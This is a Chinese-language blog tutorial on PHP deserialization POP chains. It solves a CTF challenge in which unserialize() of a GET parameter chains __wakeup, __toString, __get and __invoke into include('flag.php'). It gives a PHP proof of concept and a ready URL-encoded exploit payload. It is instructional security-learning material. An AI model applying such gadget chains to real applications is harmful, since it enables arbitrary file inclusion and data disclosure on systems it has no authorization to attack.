关注这个专栏的其他相关笔记:[Web 安全] 反序列化漏洞 - 学习笔记-CSDN博客
0x01:什么是 POP 链?
POP 链(Payload On Purpose Chain)是一种利用 PHP 中的魔法方法进行多次跳转以获取敏感数据的技术。它通常出现在 CTF 比赛中,并且与反序列化一起考察。
POP 链可以理解为反序列化的一种拓展,涉及到的魔法方法更多,泛用性更强。
0x02:POP 链 — 入门基础
POP 链,简单来说,就是把一个对象的成员属性赋值为新的对象。比如下面这个例子:
<?phpclass Node {public $nodeData; // 用来存储节点数据public $nextNode = null; // 用来存储下一个节点对象}$node1 = new Node();$node1 -> nodeData = "[ 1 ] 号节点";$node1 -> nextNode = new Node();$node1 -> nextNode -> nodeData = "[ 2 ] 号节点";echo serialize($node1);// 输出结果如下: // O:4:"Node":2:{s:8:"nodeData";s:15:"[ 1 ] 号节点";s:8:"nextNode";O:4:"Node":2:{s:8:"nodeData";s:15:"[ 2 ] 号节点";s:8:"nextNode";N;}}上面是笔者创建的一个简单的节点类,该类有两个属性,$nodeData 用来存储数据,$nextNode 用来指向下一个节点。
观察一下这个 $node1 序列化后的结果,我们可以很轻易的看到,对象中包含了对象的这么一个结构,这就是 POP 链。在后面做 CTF 时,我们就需要手动构造这么一串东西来尝试过关。
0x03:POP 链 — 构造思路
接下来,笔者以一个 CTF 的题目作为示范,来演示一下 POP 链的构造思路,下面是题目的整体源码:
<?phphighlight_file(__FILE__);class Modifier {private $var;public function append($value) {include($value); // Flag Is in the flag.phpecho $flag;}public function __invoke() {$this->append($this->var);}}class Show {public $source;public $str;public function __toString() {return $this->str->source;}public function __wakeup() {echo $this->source;}}class Test{public $p;public function __construct() {$this->p = array();}// 不存在的属性public function __get($key) {$function = $this->p;return $function();}}// pop序列化的值if (isset($_GET['pop'])) {unserialize($_GET['pop']);}我们的目标就是,尝试包含 flag.php 并读取到 flag。
下面我们就要开始分析了,笔者比较喜欢进行反向逆推的,首先确定我们最终要达成的目标:
-
确定目标:要执行
Modifier::append($value)且$value=flag.php。 -
问:谁能跳到
答:Modifier::append($value)?Modifier::__invoke()且要求Modifier对象的$var属性为flag.php。 -
问:谁能跳到
答:Modifier::__invoke()?=> 哪里能将Modifier对象当方法调用?Test::__get($key)且当Test对象的$p属性为Modifier对象时满足要求。 -
问:谁能跳到
答:Test::__get($key)?=> 哪里可能会访问某个对象的不存在的属性?Show::__toString()且当Show对象的$str属性为Test对象时满足要求。 -
问:谁能跳到
答:Show::__toString()?即哪里会把Show对象当作字符串处理?Show::__wakeup()且当Show对象的$source属性为Show对象时满足要求。 -
问:哪里能触发
答:反序列化Show::__wakeup()?Show对象。
如上,逆向推导结束,最终我们定格到了 Show::__wakeup() 方法上,即反序列化执行时,会自然触发的一个方法上。
下面开始编写 POC,POC 的编写其实就是根据答案反着来,着重关注 ”且当“ 后面的条件:
// 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。$poc -> source -> str -> p = "flag.php";echo serialize($poc); 上面的 POC 其实整体流程是对的,但是有个细节,关注一下 Modifier 类中的 $p 属性:
class Modifier {private $var;}如上,它是一个私有属性,私有属性我们是不能直接通过属性赋值的。但是我们知道,反序列化的特性,反序列化生成的对象成员属性值是由被反序列化的字符串决定的,与原来类中预定义的值无关。 那么基于此特性,虽然直接赋值不行,但是我们可以修改 Modifier 类中 $var 的默认值呀。
所以正确的最终 POC 局部如下(下面都是我们修改的主要部分):
class Modifier {// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。private $var = "flag.php";public function append($value) {include($value); // Flag Is in the flag.phpecho $flag;}public function __invoke() {$this->append($this->var);}}// 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();echo serialize($poc); 同时我们注意到,反序列化中带有 private 私有属性,且目标是通过 GET 请求接收传参的,所以为了防止我们复制 POC 的时候出现 Bug,我们还需要对最终序列化的结果进行一个 URL 编码(服务端在接收的时候其实默认会进行一次 URL 解码,所以不用慌),以确定没有漏复制任何值,所以最终 POC 如下:
<?php// highlight_file(__FILE__);class Modifier {// 5. 赋予 Modifier 对象的 $var 属性值为 flag.php。private $var = "flag.php";public function append($value) {include($value); // Flag Is in the flag.phpecho $flag;}public function __invoke() {$this->append($this->var);}}class Show {public $source;public $str;public function __toString() {return $this->str->source;}public function __wakeup() {echo $this->source;}}class Test{public $p;public function __construct() {$this->p = array();}// 不存在的属性public function __get($key) {$function = $this->p;print_r($function);return $function();}}// 1. 反序列化 Show 对象 => 创建一个 Show() 对象$poc = new Show();// 2. 赋予 Show() 对象的 $source 属性为 Show() 对象。$poc -> source = new Show();// 3. 赋予 Show() 对象的 $str 属性为 Test 对象。$poc -> source -> str = new Test();// 4. 赋予 Test 对象的 $p 属性为 Modifier 对象。$poc -> source -> str -> p = new Modifier();echo urlencode(serialize($poc));最终 Payload 如下:
O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A13%3A%22%00Modifier%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D